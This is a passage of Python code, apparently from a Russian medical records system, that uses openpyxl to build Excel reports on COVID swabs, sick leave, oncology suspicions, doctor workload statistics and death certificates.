    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Сдача повторного мазка на COVID"])
        ws1.cell(row=r, column=6).value = i["Адрес"]
        # BUG FIX: was range(1, 6), which left the address column (6) unstyled.
        for j in range(1, 7):
            ws1.cell(row=r, column=j).style = style_border1
        r += 1
    return ws1
def covid_bl_base(ws1):
    """Build the header of the sick-leave continuation ('Продолжение БЛ') sheet.

    :param ws1: target worksheet
    :return: the worksheet with title, captions and column widths set
    """
    thin = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Продолжение БЛ'
    ws1.cell(row=1, column=1).style = header_style
    # Cell geometry.
    ws1.row_dimensions[2].height = 15
    columns = [
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
    ]
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=2, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = width
        header.style = header_style
    return ws1
def covid_bl_data(ws1, data):
    """Fill the sick-leave continuation rows starting at row 3.

    :param ws1: worksheet prepared by covid_bl_base
    :param data: iterable of dicts with keys "fio_patient", "number",
        "Контактный телефон", "Оператор", "Продолжение БЛ"
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Продолжение БЛ"])
        for j in range(1, 6):
            ws1.cell(row=r, column=j).style = style_border1
        # BUG FIX: the row counter never advanced, so every record overwrote
        # row 3 (compare covid_swab_data, which increments r per record).
        r += 1
    return ws1
def onco_base(ws1, d_s, d_e):
    """Build the header of the oncology-suspicion journal for [d_s, d_e].

    :param ws1: target worksheet
    :param d_s: period start (display string)
    :param d_e: period end (display string)
    :return: the worksheet with title, captions and column widths set
    """
    thin = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=13)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=8)
    ws1.cell(row=1, column=1).value = f'ЖУРНАЛ учета онкоподозрения c {d_s} по {d_e}'
    ws1.cell(row=1, column=1).style = header_style
    # Cell geometry: captions live in row 3, row 2 is a short spacer.
    columns = [('№ п/п', 5), ('ФИО пациента', 30), ('Дата рождения', 15), ('N карты', 15), ('Врач поставил', 30), ('Дата постановки', 20), ('Врач снял', 30), ('Дата снятия', 20)]
    ws1.row_dimensions[2].height = 15
    ws1.cell(row=2, column=1).value = ''
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=3, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = width
        header.style = header_style
    return ws1
def passed_onco_data(ws1, data):
    """Fill the oncology-suspicion journal rows starting at row 4.

    Each record is indexable: 0 patient name, 1 birthday, 2 card number,
    3 doctor who set the suspicion, 4 date set, 5 doctor who removed it,
    6 date removed.  Falsy fields are rendered as a single space.

    :return: the worksheet
    """
    cell_style = NamedStyle(name="style_border1")
    thin = Side(style='thin', color="000000")
    cell_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    cell_style.font = Font(bold=False, size=12)
    cell_style.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    blank = ' '
    row = 3
    for serial, record in enumerate(data, 1):
        row += 1
        values = [
            serial,
            record[0] or blank,
            record[1] or blank,
            record[2] or blank,
            record[3] or blank,
            record[4] or blank,
            record[5] or blank,
            record[6] or blank,
        ]
        for col, val in enumerate(values, 1):
            target = ws1.cell(row=row, column=col)
            target.value = val
            target.style = cell_style
    return ws1
def style_sheet():
    """Create the four NamedStyles shared by the statistics sheets.

    :return: tuple (style_border, style_o, style_border1, style_border_res):
        bold bordered header style, bold label style, plain bordered cell
        style, and a centered bordered result style.
    """
    thin = Side(style='thin', color="000000")
    boxed = Border(left=thin, top=thin, right=thin, bottom=thin)
    style_border = NamedStyle(name="style_border")
    style_border.border = boxed
    style_border.font = Font(bold=True, size=11)
    style_border.alignment = Alignment(wrap_text=True)
    style_border1 = NamedStyle(name="style_border1")
    style_border1.border = boxed
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True)
    style_o = NamedStyle(name="style_o")
    style_o.font = Font(bold=True, size=11)
    style_border_res = NamedStyle(name="style_border_res")
    style_border_res.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    return (style_border, style_o, style_border1, style_border_res)
def statistics_tickets_base(ws1, i_obj, type_fin, d1, d2, style_border, style_o):
    """Build the header of the per-doctor statistics sheet.

    Column captions and widths go to row 7; employee, period and
    finance-source metadata go to rows 1-5.

    :param ws1: target worksheet
    :param i_obj: doctor object (fio, specialities, personal_code)
    :param type_fin: primary key of the IstochnikiFinansirovaniya record
    :param d1: period start (display string)
    :param d2: period end (display string)
    :param style_border: NamedStyle for column captions
    :param style_o: NamedStyle for bold metadata labels
    :return: the worksheet
    """
    columns = [
        ('Дата', 13),
        ('Кол-во', 7),
        ('Услуга', 15),
        ('Соисполнитель', 9),
        ('ФИО пациента,\n№ направления', 31),
        ('Дата рождения', 13),
        ('№ карты', 12),
        ('Данные полиса', 27),
        ('Код услуги', 16),
        ('Услуга \n (ует/мин)', 12),
        ('Время \n подтверждения', 18),
        ('Онкоподозрение', 13),
        ('Первичный прием', 12),
        ('Цель \n посещения\n(код)е', 13),
        ('Диагноз \n МКБ', 13),
        ('Впервые', 13),
        ('Результат \n обращения \n(код)', 13),
        ('Исход(код)', 13),
    ]
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=7, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = width
        header.style = style_border
    # Bold metadata labels.
    for row, col, text in ((1, 1, 'Сотрудник'), (2, 1, 'Должность'),
                           (4, 1, 'Период:'), (1, 5, 'Код врача'),
                           (3, 5, 'Источник')):
        label = ws1.cell(row=row, column=col)
        label.value = text
        label.style = style_o
    fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
    # Metadata values next to their labels.
    for row, col, value in ((1, 2, i_obj.fio),
                            (2, 2, i_obj.specialities.title if i_obj.specialities else ""),
                            (5, 1, d1),
                            (5, 2, 'по'),
                            (5, 3, d2),
                            (1, 6, i_obj.personal_code),
                            (3, 6, fin_obj.title)):
        ws1.cell(row=row, column=col).value = value
    return ws1
def statistics_tickets_data(ws1, issl_obj, i_obj, style_border1):
    """Fill the ticket-statistics sheet with one detail row per confirmed study.

    Rows are grouped by confirmation date: whenever the date changes, a
    highlighted 'Итого за <day>' subtotal row with SUM formulas is inserted
    and the preceding detail rows are collapsed into a hidden row group.
    After the loop a subtotal for the last day and a grand-total
    ('Итого Всего') row are appended.

    :param ws1: worksheet prepared by ``statistics_tickets_base``
    :param issl_obj: SQL result rows; tuple layout documented inside the loop
    :param i_obj: the doctor object the report is built for (``pk`` is used
        to decide main-executor / co-executor roles)
    :param style_border1: cell style applied to every detail row
    :return: the same worksheet, filled
    """
    # i_obj is the doctor object.
    my_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='a9d094', end_color='a9d094')
    total_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='ffcc66', end_color='ffcc66')
    r = 7
    r1 = r + 1  # first detail row of the current day group
    total_sum = []  # worksheet row numbers of the per-day subtotal rows
    # one_days = timedelta(1)
    current_date = ''
    for issled in issl_obj:
        # Column order in issled:
        # title, code, is_first_reception, polis_n, polis_who_give, \
        # first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \
        # co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \
        # time_confirm, maybe_onco, purpose, diagnos, iss_result, \
        # outcome, card_number, client_family, client_name, client_patronymic, \
        # birthday
        empty = ' '
        # current_datetime_confirm = issled[13]
        current_date = issled[14]
        # current_count = 1
        current_research_title = issled[0]
        f = issled[22] or empty
        n = issled[23] or empty
        p = issled[24] or empty
        current_napr = str(issled[6])
        current_patient_napr = f'{f} {n} {p}\n{current_napr}'
        current_born = issled[25]
        current_card = issled[21]
        polis_n = issled[3] or ''
        polis_who = issled[4] or ''
        current_polis = f'{polis_n};\n{polis_who}'
        current_code_reserch = issled[1]
        current_doc_conf = issled[7]
        current_def_uet = issled[8] or 0
        current_co_exec1 = issled[9]
        current_uet1 = issled[10] or 0
        current_co_exec2 = issled[11]
        current_uet2 = issled[12] or 0
        current_time_confirm = issled[15]
        current_isfirst = issled[2]
        current_onko = issled[16]
        current_purpose = issled[17]
        current_diagnos = issled[18]
        current_firsttime = issled[5]
        current_result = issled[19]
        current_octome = issled[20]
        # current_price = ''
        # Starting from the third written row, emit a per-day subtotal when
        # the date changes.  The istitle() check skips rows that already hold
        # an 'Итого...' caption instead of a date.
        if r != 7 and r != 8:
            befor_date = ws1.cell(row=r, column=1).value
            if current_date != befor_date and not (ws1.cell(row=r, column=1).value).istitle():
                r = r + 1
                ws1.cell(row=r, column=1).value = 'Итого за ' + befor_date[:2]
                ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
                ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
                total_sum.append(r)
                # Collapse the day's detail rows under the subtotal.
                ws1.row_dimensions.group(r1, r - 1, hidden=True)
                rows = ws1[f'A{r}:V{r}']
                for row in rows:
                    for cell in row:
                        cell.fill = my_fill
                r1 = r + 1
        r = r + 1
        ws1.cell(row=r, column=1).value = current_date
        ws1.cell(row=r, column=2).value = 1
        ws1.cell(row=r, column=3).value = current_research_title
        # Accumulate the UET (labour units) this doctor earned on the study,
        # depending on whether they were the main executor and/or co-executor.
        sum_uet = 0
        co_exec = ''
        if (current_doc_conf == i_obj.pk) and (current_co_exec1 == i_obj.pk):
            sum_uet = sum_uet + current_def_uet
            co_exec = co_exec + 'ОСН'
        if (current_doc_conf == i_obj.pk) and (current_co_exec1 != i_obj.pk):
            sum_uet = sum_uet + current_def_uet
            co_exec = co_exec + 'ОСН'
        if (current_doc_conf != i_obj.pk) and (current_co_exec1 == i_obj.pk):
            sum_uet = sum_uet + current_uet1
            co_exec = co_exec + 'СО-1'
        if current_co_exec2 == i_obj.pk:
            sum_uet = sum_uet + current_uet2
            co_exec = co_exec + ', СО-2'
        ws1.cell(row=r, column=4).value = co_exec
        ws1.cell(row=r, column=5).value = current_patient_napr
        ws1.cell(row=r, column=6).value = current_born
        ws1.cell(row=r, column=7).value = current_card
        ws1.cell(row=r, column=8).value = current_polis
        ws1.cell(row=r, column=9).value = current_code_reserch
        ws1.cell(row=r, column=10).value = str(sum_uet)
        ws1.cell(row=r, column=11).value = current_time_confirm
        ws1.cell(row=r, column=12).value = current_onko
        ws1.cell(row=r, column=13).value = current_isfirst
        ws1.cell(row=r, column=14).value = current_purpose
        ws1.cell(row=r, column=15).value = current_diagnos
        ws1.cell(row=r, column=16).value = current_firsttime
        ws1.cell(row=r, column=17).value = current_result
        ws1.cell(row=r, column=18).value = current_octome
        ws1.cell(row=r, column=19).value = ''
        rows = ws1[f'A{r}:V{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border1
    # Subtotal for the last (still open) day group.
    r = r + 1
    ws1.cell(row=r, column=1).value = 'Итого за ' + current_date[:2]
    ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
    ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
    ws1.row_dimensions.group(r1, r - 1, hidden=True)
    total_sum.append(r)
    rows = ws1[f'A{r}:V{r}']
    for row in rows:
        for cell in row:
            cell.fill = my_fill
    # Grand total: sum every per-day subtotal cell.
    # NOTE(review): the built formula keeps a trailing comma before ')'
    # (e.g. '=SUM((B9),(B15),)') — confirm Excel accepts this as written.
    t_s = '=SUM('
    t_s_uet = '=SUM('
    for ts in total_sum:
        t_uet = ts
        t_s = t_s + f'(B{ts})' + ','
        t_s_uet = t_s_uet + f'(J{t_uet})' + ','
    t_s = t_s + ')'
    t_s_uet = t_s_uet + ')'
    r = r + 1
    ws1.cell(row=r, column=1).value = 'Итого Всего'
    ws1.cell(row=r, column=2).value = t_s
    ws1.cell(row=r, column=10).value = t_s_uet
    rows = ws1[f'A{r}:V{r}']
    for row in rows:
        for cell in row:
            cell.fill = total_fill
    return ws1
def inderect_job_base(ws1, doc_obj, d1, d2):
    """Prepare the header of the "indirect services" sheet and return it.

    Fills row 1 with a highlighted title, sets the three column widths and
    writes the employee / period captions.
    """
    pink_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='FCD5B4', end_color='FCD5B4')
    for header_row in ws1[f'A{1}:V{1}']:
        for header_cell in header_row:
            header_cell.fill = pink_fill
    for col_num, col_width in ((1, 15), (2, 30), (3, 15)):
        ws1.column_dimensions[get_column_letter(col_num)].width = col_width
    captions = (
        (1, 1, "Косвенные услуги"),
        (2, 1, "Сотрудник"),
        (2, 2, doc_obj.fio),
        (3, 1, f'c {d1}'),
        (3, 2, f'по {d2}'),
    )
    for row_num, col_num, text in captions:
        ws1.cell(row=row_num, column=col_num).value = text
    return ws1
def inderect_job_data(ws1, indirect_job):
    """Write one worksheet row per (group, job) pair of *indirect_job*.

    *indirect_job* maps a group key to a ``{job: amount}`` mapping; rows are
    written starting at worksheet row 5, columns 1-3.  Returns the worksheet.
    """
    flattened = (
        (group_key, job_key, amount)
        for group_key, jobs in indirect_job.items()
        for job_key, amount in jobs.items()
    )
    for row_num, (group_key, job_key, amount) in enumerate(flattened, 5):
        ws1.cell(row=row_num, column=1).value = group_key
        ws1.cell(row=row_num, column=2).value = job_key
        ws1.cell(row=row_num, column=3).value = amount
    return ws1
def statistic_research_base(ws1, d1, d2, research_titile):
    """Write the header of the per-service statistics sheet; return it.

    Registers the bold 'style_border' named style, writes the service title
    and period cells, then the 13 column captions on row 4.
    """
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Исполнитель', 26),
        ('Направление, за дату', 15),
        ('Дата подтверждения', 16.5),
        ('Время подтверждения', 16.5),
        ('Источник', 10),
        ('Цена', 10),
        ('Кол-во', 7),
        ('Скидка', 7.5),
        ('Сумма', 14),
        ('Физлицо', 26),
        ('Дата рождения', 12),
        ('Возраст', 8),
        ('Карта', 15),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_data(ws1, researches):
    """Append one detail row per SQL result tuple in *researches*.

    Tuple layout (same order as the SQL select):
    napr, date_confirm, time_confirm, create_date_napr, create_time_napr,
    doc_fio, coast, discount, how_many, sum_money,
    ist_f, time_confirmation, num_card, ind_family, ind_name,
    patronymic, birthday, date_born, ind_age, ...

    :return: the worksheet
    """
    thin_side = Side(style='thin', color="000000")
    row_style = NamedStyle(name="style_border_res")
    row_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    row_style.font = Font(bold=False, size=11)
    row_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    row_num = 4
    for res in researches:
        row_num += 1
        # Worksheet columns 1..14, in order.
        row_values = (
            res[5],                            # executor FIO
            f'{res[0]}, {res[3]}',             # direction number, creation date
            res[1],                            # confirmation date
            res[2],                            # confirmation time
            res[10],                           # finance source
            res[6],                            # price
            res[8],                            # quantity
            res[7],                            # discount
            res[9],                            # total sum
            f'{res[13]} {res[14]} {res[15]}',  # patient FIO
            res[16],                           # birthday
            res[18],                           # age
            res[12],                           # card number
            res[19],
        )
        for col_idx, cell_value in enumerate(row_values, 1):
            ws1.cell(row=row_num, column=col_idx).value = cell_value
        for styled_row in ws1[f'A{row_num}:M{row_num}']:
            for styled_cell in styled_row:
                styled_cell.style = row_style
    return ws1
def statistic_research_death_base(ws1, d1, d2, research_titile):
    """Header (row 4) of the death-certificate statistics sheet; returns it."""
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Серия', 13),
        ('Номер', 15),
        ('Вид МСС', 17),
        ('Медицинская организация выдавшая свидететельство', 18),
        ('Прикрепление пациента', 18),
        ('Участок', 10),
        ('Дата смерти', 11),
        ('Дата рождения', 11),
        ('ФИО умершего пациента', 25),
        ('Пол (м/ж)', 6),
        ('Возраст на дату смерти', 6),
        ('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
        ('а) период', 10),
        ('а) Код по МКБ- 10', 9),
        ('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
        ('б) период', 10),
        ('б) Код по МКБ- 10', 9),
        ('в) перво-начальная причина смерти', 17),
        ('в) период', 10),
        ('в) Код по МКБ- 10', 9),
        ('г) внешняя причина при травмах и отравлениях', 17),
        ('г) период', 10),
        ('г) Код по МКБ- 10', 9),
        ('II.Прочие важные состояния способствовавшие смерти', 15),
        ('класс заболевания первоначальной причины смерти', 15),
        ('Место смерти (1/0)', 15),
        ('Название стационара', 15),
        ('ДТП (1/0)', 12),
        ('Материнская смертность (1/0)', 15),
        ('ФИО выдавшего свидетельства', 20),
        ('Тип места смерти', 25),
        ('ОКПО', 16),
        ('ОКАТО', 16),
        ('Экспертиза', 35),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_reserved_research_death_base(ws1, d1, d2, research_titile):
    """Header (row 4) of the reserved death-certificate sheet; returns it."""
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border_rz")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Медицинская организация', 40),
        ('Номер в резерве', 20),
        ('Дата создания', 22),
        ('<NAME>', 35),
        ('Направление', 20),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_death_base_card(ws1, d1, d2, research_titile):
    """Header (row 4) of the death-certificate card sheet; returns it.

    Same column set as ``statistic_research_death_base`` but registered
    under a distinct named style so both sheets can live in one workbook.
    """
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border_ca")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Серия', 13),
        ('Номер', 15),
        ('Вид МСС', 17),
        ('Медицинская организация выдавшая свидететельство', 18),
        ('Прикрепление пациента', 18),
        ('Участок', 10),
        ('Дата смерти', 11),
        ('Дата рождения', 11),
        ('ФИО умершего пациента', 25),
        ('Пол (м/ж)', 6),
        ('Возраст на дату смерти', 6),
        ('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
        ('а) период', 10),
        ('а) Код по МКБ- 10', 9),
        ('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
        ('б) период', 10),
        ('б) Код по МКБ- 10', 9),
        ('в) перво-начальная причина смерти', 17),
        ('в) период', 10),
        ('в) Код по МКБ- 10', 9),
        ('г) внешняя причина при травмах и отравлениях', 17),
        ('г) период', 10),
        ('г) Код по МКБ- 10', 9),
        ('II.Прочие важные состояния способствовавшие смерти', 15),
        ('класс заболевания первоначальной причины смерти', 15),
        ('Место смерти (1/0)', 15),
        ('Название стационара', 15),
        ('ДТП (1/0)', 12),
        ('Материнская смертность (1/0)', 15),
        ('ФИО выдавшего свидетельства', 20),
        ('Тип места смерти', 25),
        ('ОКПО', 16),
        ('ОКАТО', 16),
        ('Экспертиза', 35),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_death_data(ws1, researches, expertise_final_data):
    """Fill the death-certificate sheet: one row per issued certificate.

    :param ws1: worksheet prepared by ``statistic_research_death_base``
    :param researches: iterable of per-certificate dicts; keys are the
        Russian field titles of the death-certificate form
    :param expertise_final_data: mapping issledovaniye_id -> expertise text
    :return: the worksheet (returned early if a falsy record is encountered)
    """
    style_border_res = NamedStyle(name="style_border_res")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4
    for i in researches:
        if not i:
            return ws1
        # The certificate kind may be stored either as {"title": ...} or as a
        # plain string; the broad except covers the non-dict case.
        try:
            type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
        except:
            type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
        if not type_doc_death:
            continue
        r += 1
        ws1.cell(row=r, column=1).value = i["Серия"]
        ws1.cell(row=r, column=2).value = i["Номер"]
        ws1.cell(row=r, column=3).value = type_doc_death
        ws1.cell(row=r, column=4).value = i["hosp_title"]
        # "Прикрепление" looks like "<MO code> — <district>"; the code part is
        # mapped to the hospital title where known.
        mo_attachment, mo_district = "-", "-"
        if i.get("Прикрепление", None):
            attachment_data = i.get("Прикрепление").split("—")
            mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
            mo_district = attachment_data[1]
        ws1.cell(row=r, column=5).value = mo_attachment
        ws1.cell(row=r, column=6).value = mo_district
        ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
        ws1.cell(row=r, column=8).value = i["Дата рождения"]
        ws1.cell(row=r, column=9).value = i["fio_patient"]
        ws1.cell(row=r, column=10).value = i["sex"]
        # Age at death in full years; "-" when the birth date cannot be parsed.
        d1 = du_parse(i["Дата смерти"])
        try:
            d2 = du_parse(i["Дата рождения"])
            delta = relativedelta(d1, d2)
            ws1.cell(row=r, column=11).value = delta.years
        except:
            ws1.cell(row=r, column=11).value = "-"
        # (a) disease or condition directly leading to death
        diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
        ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=13).value = diag_data[0]
        ws1.cell(row=r, column=14).value = diag_data[1]["code"]
        # (b) pathological condition that led to (a)
        diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
        ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=16).value = diag_data[0]
        ws1.cell(row=r, column=17).value = diag_data[1]["code"]
        # (c) initial (underlying) cause of death
        diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
        ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=19).value = diag_data[0]
        ws1.cell(row=r, column=20).value = diag_data[1]["code"]
        # (d) external cause for traumas and poisonings
        diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
        ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=22).value = diag_data[0]
        ws1.cell(row=r, column=23).value = diag_data[1]["code"]
        # II. other significant conditions contributing to death
        diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
        ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
        ws1.cell(row=r, column=25).value = ""
        # "Место смерти" may be a JSON string or an already-parsed dict.
        # NOTE(review): unlike statistic_research_death_data_card, a parsed
        # JSON dict is written as-is here instead of extracting its "address"
        # key — confirm this difference is intentional.
        place_death_details = ""
        try:
            place_death_details = json.loads(i["Место смерти"])
            is_dict = True
        except:
            is_dict = False
        if not is_dict:
            try:
                place_death_details = i["Место смерти"].get("address", None)
                is_dict = True
            except:
                is_dict = False
        if not is_dict:
            place_death_details = "-"
        ws1.cell(row=r, column=26).value = place_death_details
        # Hospital name
        ws1.cell(row=r, column=27).value = i.get("МО", "")
        # Road-accident flag
        ws1.cell(row=r, column=28).value = i["ДТП"]
        ws1.cell(row=r, column=29).value = i["Беременность"]
        if i.get("Заполнил", None):
            who_write = i.get("Заполнил")
        else:
            who_write = ""
        ws1.cell(row=r, column=30).value = who_write
        ws1.cell(row=r, column=31).value = ""
        ws1.cell(row=r, column=32).value = ""
        ws1.cell(row=r, column=33).value = ""
        experise = ""
        if expertise_final_data.get(i.get('issledovaniye_id', ""), ""):
            experise = expertise_final_data.get(i.get('issledovaniye_id', ""), "")
        ws1.cell(row=r, column=34).value = experise
        rows = ws1[f'A{r}:AH{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_death_data_card(ws1, researches):
    """Fill the death-certificate *card* sheet: one row per certificate.

    Near-duplicate of ``statistic_research_death_data``; differences: no
    expertise column, the place-of-death JSON has its "address" extracted,
    and columns 31-33 carry the death-place type and hospital OKPO/OKATO.

    :param ws1: worksheet prepared by ``statistic_research_death_base_card``
    :param researches: iterable of per-certificate dicts; keys are the
        Russian field titles of the death-certificate form
    :return: the worksheet (returned early if a falsy record is encountered)
    """
    style_border_res = NamedStyle(name="style_border_res_ca")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4
    for i in researches:
        if not i:
            return ws1
        # Certificate kind: {"title": ...} dict or plain string.
        try:
            type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
        except:
            type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
        if not type_doc_death:
            continue
        r += 1
        ws1.cell(row=r, column=1).value = i["Серия"]
        ws1.cell(row=r, column=2).value = i["Номер"]
        ws1.cell(row=r, column=3).value = type_doc_death
        ws1.cell(row=r, column=4).value = i["hosp_title"]
        # "Прикрепление" looks like "<MO code> — <district>".
        mo_attachment, mo_district = "-", "-"
        if i.get("Прикрепление", None):
            attachment_data = i.get("Прикрепление").split("—")
            mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
            mo_district = attachment_data[1]
        ws1.cell(row=r, column=5).value = mo_attachment
        ws1.cell(row=r, column=6).value = mo_district
        ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
        ws1.cell(row=r, column=8).value = i["Дата рождения"]
        ws1.cell(row=r, column=9).value = i["fio_patient"]
        ws1.cell(row=r, column=10).value = i["sex"]
        # Age at death in full years; "-" when the birth date cannot be parsed.
        d1 = du_parse(i["Дата смерти"])
        try:
